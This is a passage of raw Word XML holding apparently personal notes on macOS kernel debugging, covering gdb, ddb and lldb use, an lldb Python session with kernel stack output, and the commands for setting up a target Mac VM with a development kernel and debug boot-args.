          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>here are times when </w:t>
      </w:r>
      <w:r w:rsidRPr="00A02543">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="666666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>gdb</w:t>
      </w:r>
      <w:r w:rsidRPr="00A02543">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:eastAsia="宋体" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> cannot be used or where </w:t>
      </w:r>
      <w:r w:rsidRPr="00A02543">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:color w:val="666666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>gdb</w:t>
      </w:r>
      <w:r w:rsidRPr="00A02543">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:eastAsia="宋体" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> can easily run into problems. Some of these include</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A02543" w:rsidRPr="00A02543" w:rsidRDefault="00A02543" w:rsidP="00A02543">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="160" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="324"/>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:eastAsia="宋体" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A02543">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:eastAsia="宋体" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">drivers for </w:t>
      </w:r>
      <w:r w:rsidRPr="00A02543">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:eastAsia="宋体" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>built-in Ethernet hardware</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A02543" w:rsidRPr="00A02543" w:rsidRDefault="00A02543" w:rsidP="00A02543">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="160" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="324"/>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:eastAsia="宋体" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A02543">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:eastAsia="宋体" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>interrupt handlers (the hardware variety, not handler threads)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A02543" w:rsidRPr="00A02543" w:rsidRDefault="00A02543" w:rsidP="00A02543">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="160" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="324"/>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:eastAsia="宋体" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A02543">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:eastAsia="宋体" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>early bootstrap before the network hardware</w:t>
      </w:r>
      <w:r w:rsidRPr="00A02543">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:eastAsia="宋体" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> is initialized</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A02543" w:rsidRPr="00A02543" w:rsidRDefault="00A02543" w:rsidP="00B104E2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="444444"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A02543" w:rsidRDefault="00A02543" w:rsidP="00A02543">
      <w:pPr>
        <w:ind w:firstLineChars="150" w:firstLine="300"/>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Unlike</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="666666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>gdb</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>(which uses Ethernet for communication with a kernel stub),</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="666666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ddb</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>is built into the kernel itself, and interacts directly with the user over a serial line. Also</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>unlike</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="666666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>gdb</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>, using</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="666666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ddb</w:t>
      </w:r>
      <w:r w:rsidRPr="00A02543">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A02543">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>requires building a custom kernel using the</w:t>
      </w:r>
      <w:r w:rsidRPr="00A02543">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A02543">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>DEBUG</w:t>
      </w:r>
      <w:r w:rsidRPr="00A02543">
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>configuration</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Sans Unicode" w:hAnsi="Lucida Sans Unicode" w:cs="Lucida Sans Unicode"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A02543" w:rsidRDefault="00A02543" w:rsidP="00A02543">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">gdb vs lldb </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A02543" w:rsidRDefault="00A02543" w:rsidP="00B104E2"/>
    <w:p w:rsidR="00A02543" w:rsidRDefault="004106D2" w:rsidP="00B104E2">
      <w:hyperlink r:id="rId56" w:anchor="//apple_ref/doc/uid/TP40012917-CH3-SW1" w:history="1">
        <w:r w:rsidR="00A02543" w:rsidRPr="001D68D1">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://developer.apple.com/library/mac/documentation/IDEs/Conceptual/gdb_to_lldb_transition_guide/document/lldb-command-examples.html#//apple_ref/doc/uid/TP40012917-CH3-SW1</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00093FEF" w:rsidRDefault="00093FEF" w:rsidP="00093FEF">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>lldb</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00673227" w:rsidRDefault="00673227" w:rsidP="00673227">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/Library/Developer/CommandLineTools/Library/PrivateFrameworks/LLDB.framework</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00673227" w:rsidRPr="00673227" w:rsidRDefault="00DF0299" w:rsidP="00673227">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0942472A" wp14:editId="4EB0C6E3">
            <wp:extent cx="4297151" cy="2453571"/>
            <wp:effectExtent l="0" t="0" r="8255" b="4445"/>
            <wp:docPr id="13" name="Picture 13" descr="E:\SharedFolder\MacShare\2015-04-07\Screen Shot 2015-04-08 at 2.3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redFolder\MacShare\2015-04-07\Screen Shot 2015-04-08 at 2.31.43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6607" cy="2453260"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00093FEF" w:rsidRDefault="00093FEF" w:rsidP="00093FEF">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">lldb python script </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00093FEF" w:rsidRDefault="004106D2" w:rsidP="00093FEF">
      <w:hyperlink r:id="rId58" w:history="1">
        <w:r w:rsidR="00093FEF" w:rsidRPr="00EB4348">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://lldb.llvm.org/python-reference.html</w:t>
        </w:r>
      </w:hyperlink>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lldb) </w:t>
      </w:r>
      <w:r w:rsidRPr="00093FEF">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>script</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Python Interactive Interpreter. To exit, type 'quit()', 'exit()' or Ctrl-D.</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print lldb.debugger</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Debugger (instance: "debugger_1", id: 1)</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print lldb.target</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a.out</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print lldb.process</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SBProcess: pid = 59289, state = stopped, threads = 1, executable = a.out</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print lldb.thread</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SBThread: tid = 0x1f03</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print lldb.frame</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00093FEF" w:rsidRPr="00093FEF" w:rsidRDefault="00093FEF" w:rsidP="0009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frame #0: 0x0000000100000bb6 a.out main + 54 at main.c:16</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0310D" w:rsidRPr="00093FEF" w:rsidRDefault="00E0310D" w:rsidP="00E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sidRPr="00093FEF">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>lldb.</w:t>
      </w:r>
      <w:r w:rsidR="00853680">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>thread.GetThreadID()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00853680" w:rsidRPr="00093FEF" w:rsidRDefault="00853680" w:rsidP="008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093FEF">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;&gt;&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>14210</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00882CA5" w:rsidRPr="00882CA5" w:rsidRDefault="00882CA5" w:rsidP="00882CA5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00882CA5">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">(lldb) showcurrentstacks </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00882CA5" w:rsidRPr="00882CA5" w:rsidRDefault="00882CA5" w:rsidP="00882CA5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pP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 xml:space="preserve">Processor 0xffffff8007ee1588 cpu_id  0x0 State RUNNING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 xml:space="preserve">task                 vm_map               ipc_space            #acts flags    pid       process             io_policy  wq_state  command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 xml:space="preserve">0xffffff800d4f4b70   0xffffff8009edaf00   0xffffff800d28bf18      93            0   0xffffff8007f0a108                -1 -1 -1    kernel_task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lastRenderedPageBreak/>
        <w:tab/>
        <w:t xml:space="preserve">thread                   thread_id  processor            base   pri    sched_mode      io_policy       state    ast          wait_queue                       wait_event           wmesg                thread_name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0dcb40d0       0x10d      0xffffff8007ee1588   81     81     fixed                           R        L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Backtrace:</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reserved_stack = 0xffffff8066950000</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kernel_stack = 0xffffff8067368000</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stacktop = 0xffffff806736bda0</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da0 0xffffff8007807597 Debugger((const char *) message = &lt;&gt;, )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e60 0xffffff7f885725ce IOHIDFamily`IOHIDSystem::keyboardEventGated(unsigned int, unsigned int, unsigned int, unsigned int, unsigned int, unsigned int, unsigned int, unsigned int, bool, unsigned long long, OSObject*) + 0x36c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ec0 0xffffff7f88572255 IOHIDFamily`IOHIDSystem::doKeyboardEvent(IOHIDSystem*, void*) + 0x57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ef0 0xffffff7f8856e182 IOHIDFamily`IOHIDSystem::processKeyboardEQ(IOHIDSystem*, unsigned long long*) + 0x8e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f40 0xffffff8007cc4272 IOInterruptEventSource::checkForWork()((IOInterruptEventSource *) this = &lt;&gt;, )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f80 0xffffff8007cc218d IOWorkLoop::runEventSources()((IOWorkLoop *) this = 0xffffff800d738c80) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00882CA5" w:rsidRPr="00882CA5" w:rsidRDefault="00882CA5" w:rsidP="00882CA5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00882CA5">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">0xffffff806736bfb0 0xffffff8007cc2256 IOWorkLoop::threadMain()((IOWorkLoop *) this = 0xffffff800d738c80) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00093FEF" w:rsidRPr="00882CA5" w:rsidRDefault="00882CA5" w:rsidP="00882CA5">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00882CA5">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>stackbottom = 0xffffff806736bfb0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0014464C" w:rsidRDefault="0014464C" w:rsidP="0014464C">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="111" w:name="_Toc445313313"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Target Mac VM</w:t>
      </w:r>
      <w:bookmarkEnd w:id="111"/>
    </w:p>
    <w:p w:rsidR="00CD21E9" w:rsidRPr="00CD21E9" w:rsidRDefault="00CD21E9" w:rsidP="00CD21E9">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>sudo cp /Library/Developer/KDKs/*/System/Library/Kernels/kernel.development /System/Library/Kernels/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0014464C" w:rsidRDefault="00444C32" w:rsidP="0014464C">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r w:rsidR="0014464C" w:rsidRPr="0014464C">
        <w:t xml:space="preserve">sudo </w:t>
      </w:r>
      <w:r w:rsidR="00576E0B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>show</w:t>
      </w:r>
      <w:r w:rsidR="0014464C" w:rsidRPr="0014464C">
        <w:t>-args="debug=0x</w:t>
      </w:r>
      <w:r w:rsidR="00C679E3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidR="00582D85">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0014464C" w:rsidRPr="0014464C">
        <w:t xml:space="preserve"> -v"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00444C32" w:rsidRDefault="00444C32" w:rsidP="0014464C">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>sudo nvram boot-args="pmuflags=1 debug=0x166 kext-dev-mode=1 kcsuffix=development -v"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006956E7" w:rsidRDefault="00444C32" w:rsidP="0014464C">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">sudo kextcache -invalidate / </w:t>
      </w:r>
    </w:p>
